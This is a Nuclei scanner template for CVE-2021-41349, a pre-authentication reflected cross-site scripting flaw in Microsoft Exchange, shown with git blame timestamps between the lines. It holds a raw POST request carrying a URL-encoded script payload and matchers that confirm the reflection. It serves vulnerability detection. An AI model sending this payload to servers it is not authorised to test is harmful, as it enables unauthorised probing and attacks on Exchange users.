nuclei-templates/cves/2021/CVE-2021-41349.yaml

51 lines
1.4 KiB
YAML
Raw Normal View History

2021-11-12 18:59:04 +00:00
id: CVE-2021-41349
2021-11-12 18:25:15 +00:00
info:
name: Microsoft Exchange Server Pre-Auth POST Based Reflected Cross-Site Scripting
2021-11-12 18:59:04 +00:00
author: rootxharsh,iamnoooob
2021-11-12 18:25:15 +00:00
severity: medium
description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.
2021-11-12 18:59:04 +00:00
reference:
- https://www.microsoft.com/en-us/download/details.aspx?id=103643
2021-11-12 18:59:04 +00:00
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349
- https://nvd.nist.gov/vuln/detail/CVE-2021-41349
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2021-41349
tags: cve,cve2021,xss,microsoft,exchange
2021-11-12 18:59:04 +00:00
2021-11-12 18:25:15 +00:00
requests:
- raw:
- |
POST /autodiscover/autodiscover.json HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2021-11-12 19:07:40 +00:00
%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1
2021-11-12 18:25:15 +00:00
2021-11-12 18:59:04 +00:00
matchers-condition: and
2021-11-12 18:25:15 +00:00
matchers:
2021-11-12 18:59:04 +00:00
- type: word
words:
2021-11-12 19:07:40 +00:00
- 'alert(document.domain);'
- 'a=""'
condition: and
2021-11-12 18:59:04 +00:00
- type: word
part: header
words:
- 'text/html'
2022-05-26 03:05:36 +00:00
- type: word
words:
- "A potentially dangerous Request.Form value was detected from the client"
negative: true
2021-11-12 18:59:04 +00:00
- type: status
status:
- 500
2022-05-26 03:05:36 +00:00
# Enhanced by xiaostrong on 2022/05/26